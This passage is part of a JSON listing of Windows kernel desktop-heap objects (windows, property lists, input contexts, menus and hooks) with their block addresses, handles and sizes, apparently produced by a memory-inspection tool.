0f8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607b50","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006127d0","Type":"INPUTCONTEXT","Handle":"0xb00f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ac40","Type":"WINDOW","Handle":"0x200fa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ac0","Type":"INPUTCONTEXT","Handle":"0xa00fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006271e0","Type":"WINDOW","Handle":"0x300fc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609e70","Type":"WINDOW","Handle":"0x100fe","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9c0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d50060cd20","Type":"INPUTCONTEXT","Handle":"0x400ff","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a0f0","Type":"WINDOW","Handle":"0x10100","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060abb0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060f700","Type":"INPUTCONTEXT","Handle":"0x20101","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a350","Type":"WINDOW","Handle":"0x10102","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060aa40","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500621180","Type":"MENU","Handle":"0x60103","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628430","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060a4d0","Type":"WINDOW","Handle":"0x10104","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a650","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060eab0","Type":"INPUTCONTEXT","Handle":"0x20105","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a850","Type":"WINDOW","Handle":"0x10106","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a9d0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d5006116b0","Type":"HOOK","Handle":"0x20107","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d50060af20","Type":"WINDOW","Handle":"0x2010a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619880","Type":"INPUTCONTEXT","Handle":"0x1010b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b090","Type":"WINDOW","Handle":"0x1010c","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061a4c0","Type":"INPUTCONTEXT","Handle":"0x1010d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b2c0","Type":"WINDOW","Handle":"0x1010e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b4f0","Type":"WINDOW","Handle":"0x10110","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618a80","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50060b670","Type":"WINDOW","Handle":"0x10112","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b7f0","Type":"WINDOW","Handle":"0x10114","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060baa0","Type":"WINDOW","Handle":"0x10116","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060bc30","Type":"WINDOW","Handle":"0x10118","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c040","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061a510","Type":"INPUTCONTEXT","Handle":"0x10119","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060be90","Type":"WINDOW","Handle":"0x1011a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ba30","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50061aa00","Type":"INPUTCONTEXT","Handle":"0x1011b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c130","Type":"WINDOW","Handle":"0x1011c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9a0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061aa70","Type":"INPUTCONTEXT","Handle":"0x1011d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c360","Type":"WINDOW","Handle":"0x1011e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609050","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab00","Type":"INPUTCONTEXT","Handle":"0x10121","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c810","Type":"WINDOW","Handle":"0x10122","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060c670","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab70","Type":"INPUTCONTEXT","Handle":"0x10123","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c9d0","Type":"WINDOW","Handle":"0x10124","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061abe0","Type":"INPUTCONTEXT","Handle":"0x10125","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cba0","Type":"WINDOW","Handle":"0x10126","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006039c0","Type":"MENU","Handle":"0x20127","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500621750","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060cdb0","Type":"WINDOW","Handle":"0x10128","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500604b70","Type":"INPUTCONTEXT","Handle":"0x20129","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cf20","Type":"WINDOW","Handle":"0x1012a","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061aef0","Type":"INPUTCONTEXT","Handle":"0x1012b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d0f0","Type":"WINDOW","Handle":"0x1012c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500610980","Type":"MENU","Handle":"0x3012d","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006273c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060d2b0","Type":"WINDOW","Handle":"0x1012e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d450","Type":"WINDOW","Handle":"0x10130","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061c7d0","Type":"INPUTCONTEXT","Handle":"0x20131","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d700","Type":"WINDOW","Handle":"0x10132","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d880","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50061b380","Type":"INPUTCONTEXT","Handle":"0x10133","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d9c0","Type":"WINDOW","Handle":"0x10134","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060db70","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060dbb0","Type":"WINDOW","Handle":"0x10136","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060dd30","Type":"WINDOW","Handle":"0x10138","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060deb0","Type":"WINDOW","Handle":"0x1013a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bf50","Type":"INPUTCONTEXT","Handle":"0x7013b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e180","Type":"WINDOW","Handle":"0x1013c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061b9c0","Type":"INPUTCONTEXT","Handle":"0x3013d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e3c0","Type":"WINDOW","Handle":"0x1013e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060e6a0","Type":"WINDOW","Handle":"0x10140","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bcf0","Type":"INPUTCONTEXT","Handle":"0x10141","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e900","Type":"WINDOW","Handle":"0x10142","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617ef0","Type":"INPUTCONTEXT","Handle":"0x10143","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ec00","Type":"WINDOW","Handle":"0x10144","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060edf0","Type":"WINDOW","Handle":"0x10146","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006170d0","Type":"INPUTCONTEXT","Handle":"0x180147","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f0c0","Type":"WINDOW","Handle":"0x10148","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006028f0","Type":"INPUTCONTEXT","Handle":"0x80149","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f4f0","Type":"WINDOW","Handle":"0x1014a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f750","Type":"WINDOW","Handle":"0x1014c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fa30","Type":"WINDOW","Handle":"0x1014e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fc00","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060c080","Type":"INPUTCONTEXT","Handle":"0x5014f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060fc60","Type":"WINDOW","Handle":"0x10150","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fde0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fe40","Type":"WINDOW","Handle":"0x10152","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ffc0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061c8b0","Type":"HOOK","Handle":"0x10153","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500610020","Type":"WINDOW","Handle":"0x10154","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006101a0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500610200","Type":"WINDOW","Handle":"0x10156","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610380","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d5006103e0","Type":"WINDOW","Handle":"0x10158","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610560","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fbb0","Type":"INPUTCONTEXT","Handle":"0x50159","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006105c0","Type":"WINDOW","Handle":"0x1015a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610740","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d5006110f0","Type":"INPUTCONTEXT","Handle":"0x1015b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006107a0","Type":"WINDOW","Handle":"0x1015c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500611160","Type":"INPUTCONTEXT","Handle":"0x1015d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610a20","Type":"WINDOW","Handle":"0x1015e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121f0","Type":"INPUTCONTEXT","Handle":"0x2015f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610c90","Type":"WINDOW","Handle":"0x10160","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121a0","Type":"INPUTCONTEXT","Handle":"0x90161","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610f20","Type":"WINDOW","Handle":"0x10162","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006110c0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006111b0","Type":"WINDOW","Handle":"0x10164","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612710","Type":"INPUTCONTEXT","Handle":"0x10167","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006114f0","Type":"WINDOW","Handle":"0x10168","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612780","Type":"INPUTCONTEXT","Handle":"0x10169","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611820","Type":"WINDOW","Handle":"0x1016a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500620620","Type":"INPUTCONTEXT","Handle":"0xb016b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611a90","Type":"WINDOW","Handle":"0x1016c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500611c10","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500612860","Type":"INPUTCONTEXT","Handle":"0x1016d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c4e0","Type":"WINDOW","Handle":"0x2016e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006128d0","Type":"INPUTCONTEXT","Handle":"0x1016f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611e60","Type":"WINDOW","Handle":"0x10170","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612000","Type":"WINDOW","Handle":"0x10172","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613210","Type":"INPUTCONTEXT","Handle":"0x10173","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612350","Type":"WINDOW","Handle":"0x10174","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613280","Type":"INPUTCONTEXT","Handle":"0x10175","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006124c0","Type":"WINDOW","Handle":"0x10176","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ba0","Type":"INPUTCONTEXT","Handle":"0x10177","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612bb0","Type":"WINDOW","Handle":"0x10178","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500612e00","Type":"WINDOW","Handle":"0x1017a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613080","Type":"WINDOW","Handle":"0x1017c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613cc0","Type":"INPUTCONTEXT","Handle":"0x1017d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006133c0","Type":"WINDOW","Handle":"0x1017e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500614120","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d500613d10","Type":"HOOK","Handle":"0x2017f","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006135f0","Type":"WINDOW","Handle":"0x10180","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613770","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500613ef0","Type":"INPUTCONTEXT","Handle":"0x10181","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621d90","Type":"WINDOW","Handle":"0x20182","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613f40","Type":"INPUTCONTEXT","Handle":"0x10183","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006141e0","Type":"WINDOW","Handle":"0x20184","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613dc0","Type":"INPUTCONTEXT","Handle":"0x10185","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614350","Type":"WINDOW","Handle":"0x10186","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614040","Type":"INPUTCONTEXT","Handle":"0x10187","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614510","Type":"WINDOW","Handle":"0x10188","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006140b0","Type":"INPUTCONTEXT","Handle":"0x10189","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614680","Type":"WINDOW","Handle":"0x1018a","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061bd40","Type":"WINDOW:PROPLIST","Size":14,"UnusedBytes":8},{"Block":"0xffffc8d500613fb0","Type":"INPUTCONTEXT","Handle":"0x1018b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006148b0","Type":"WINDOW","Handle":"0x1018c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500614a30","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614cc0","Type":"WINDOW","Handle":"0x1018e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006144c0","Type":"INPUTCONTEXT","Handle":"0x1018f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614e80","Type":"WINDOW","Handle":"0x10190","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615150","Type":"WINDOW","Handle":"0x10192","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006153d0","Type":"WINDOW","Handle":"0x10194","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614b00","Type":"HOOK","Handle":"0x10195","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500615900","Type":"WINDOW","Handle":"0x10196","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614a70","Type":"INPUTCONTEXT","Handle":"0x10197","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500615b50","Type":"WINDOW","Handle":"0x10198","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615dd0","Type":"WINDOW","Handle":"0x1019a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614e30","Type":"INPUTCONTEXT","Handle":"0x1019b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616820","Type":"WINDOW","Handle":"0x1019e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500617fc0","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500615010","Type":"INPUTCONTEXT","Handle":"0x1019f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616a20","Type":"WINDOW","Handle":"0x101a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616ba0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614b90","Type":"INPUTCONTEXT","Handle":"0x201a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617180","Type":"WINDOW","Handle":"0x201a2","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006173f0","Type":"WINDOW","Handle":"0x101a4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615540","Type":"INPUTCONTEXT","Handle":"0x101a5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617570","Type":"WINDOW","Handle":"0x101a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615620","Type":"INPUTCONTEXT","Handle":"0x101a7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006176f0","Type":"WINDOW","Handle":"0x101a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006178b0","Type":"WINDOW","Handle":"0x101aa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500615f60","Type":"INPUTCONTEXT","Handle":"0x101ab","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d500617bb0","Type":"WINDOW","Handle":"0x101ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615fe0","Type":"INPUTCONTEXT","Handle":"0x101ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006181f0","Type":"WINDOW","Handle":"0x101ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500616050","Type":"INPUTCONTEXT","Handle":"0x101af","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618580","Type":"WINDOW","Handle":"0x101b0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b580","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d5006160c0","Type":"INPUTCONTEXT","Handle":"0x101b1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618800","Type":"WINDOW","Handle":"0x101b2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500618990","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500616130","Type":"INPUTCONTEXT","Handle":"0x101b3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618b40","Type":"WINDOW","Handle":"0x101b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500618cd0","Type":"WINDOW","Handle":"0x101b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616670","Type":"INPUTCONTEXT","Handle":"0x101b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618e50","Type":"WINDOW","Handle":"0x101b8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006166e0","Type":"INPUTCONTEXT","Handle":"0x101b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619020","Type":"WINDOW","Handle":"0x101ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616d80","Type":"INPUTCONTEXT","Handle":"0x101bb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619250","Type":"WINDOW","Handle":"0x101bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006196c0","Type":"WINDOW","Handle":"0x101c0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500619bc0","Type":"WINDOW:PROPLIST","Size":8,"UnusedBytes":8},{"Block":"0xffffc8d500616dd0","Type":"HOOK","Handle":"0x201c1","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006199e0","Type":"WINDOW","Handle":"0x101c2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b540","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500616f40","Type":"INPUTCONTEXT","Handle":"0x101c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619c40","Type":"WINDOW","Handle":"0x101c4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616fb0","Type":"INPUTCONTEXT","Handle":"0x101c5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619eb0","Type":"WINDOW","Handle":"0x101c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a060","Type":"WINDOW","Handle":"0x101c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a350","Type":"WINDOW","Handle":"0x101ca","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619840","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500617310","Type":"INPUTCONTEXT","Handle":"0x101cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061a660","Type":"WINDOW","Handle":"0x101cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006173a0","Type":"INPUTCONTEXT","Handle":"0x101cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611c30","Type":"WINDOW","Handle":"0x201ce","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500621220","Type":"MENU","Handle":"0x301cf","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628eb0","Type":"MENU:ITEMS","Size":145,"UnusedBytes":16},{"Block":"0xffffc8d50061aca0","Type":"WINDOW","Handle":"0x101d0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061a820","Type":"WINDOW","Handle":"0x201d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616180","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061b1f0","Type":"WINDOW","Handle":"0x101d4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b3d0","Type":"WINDOW","Handle":"0x101d6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620290","Type":"WINDOW","Handle":"0x301da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bb00","Type":"WINDOW","Handle":"0x101dc","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061bfa0","Type":"WINDOW","Handle":"0x101de","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c110","Type":"WINDOW","Handle":"0x101e0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c280","Type":"WINDOW","Handle":"0x101e2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c3f0","Type":"WINDOW","Handle":"0x101e4","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061d190","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50061c5e0","Type":"WINDOW","Handle":"0x101e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c110","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500615370","Type":"INPUTCONTEXT","Handle":"0x101e7","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d50061c9d0","Type":"WINDOW","Handle":"0x101e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617d50","Type":"INPUTCONTEXT","Handle":"0x101e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621fd0","Type":"WINDOW","Handle":"0x301ea","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c820","Type":"INPUTCONTEXT","Handle":"0x101ec","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617e30","Type":"INPUTCONTEXT","Handle":"0x101ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cbf0","Type":"INPUTCONTEXT","Handle":"0x101ee","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006180b0","Type":"INPUTCONTEXT","Handle":"0x101ef","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cc40","Type":"WINDOW","Handle":"0x101f0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061cdf0","Type":"INPUTCONTEXT","Handle":"0x101f2","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ce40","Type":"WINDOW","Handle":"0x101f4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061d020","Type":"INPUTCONTEXT","Handle":"0x101f6","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618440","Type":"INPUTCONTEXT","Handle":"0x101f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d090","Type":"INPUTCONTEXT","Handle":"0x101f8","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006189c0","Type":"INPUTCONTEXT","Handle":"0x101f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cb70","Type":"INPUTCONTEXT","Handle":"0x101fa","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618a30","Type":"INPUTCONTEXT","Handle":"0x101fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d250","Type":"WINDOW","Handle":"0x101fc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618fd0","Type":"INPUTCONTEXT","Handle":"0x101fd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d0e0","Type":"INPUTCONTEXT","Handle":"0x101fe","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d3d0","Type":"WINDOW","Handle":"0x10200","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d720","Type":"WINDOW","Handle":"0x10202","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061db80","Type":"INPUTCONTEXT","Handle":"0x20203","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d890","Type":"WINDOW","Handle":"0x10204","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060ef90","Type":"INPUTCONTEXT","Handle":"0x60205","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061da00","Type":"WINDOW","Handle":"0x10206","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dbf0","Type":"WINDOW","Handle":"0x10208","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dd70","Type":"WINDOW","Handle":"0x1020a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061def0","Type":"WINDOW","Handle":"0x1020c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061e100","Type":"WINDOW","Handle":"0x1020e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e2a0","Type":"WINDOW","Handle":"0x10210","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604a20","Type":"INPUTCONTEXT","Handle":"0x40211","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061e440","Type":"WINDOW","Handle":"0x10212","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e620","Type":"WINDOW","Handle":"0x10214","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006213d0","Type":"MENU","Handle":"0x5021b","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006288c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d5006113a0","Type":"INPUTCONTEXT","Handle":"0x50225","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622870","Type":"INPUTCONTEXT","Handle":"0x10242","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006228e0","Type":"INPUTCONTEXT","Handle":"0xa0244","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006230f0","Type":"INPUTCONTEXT","Handle":"0x30248","Size":5,"Unu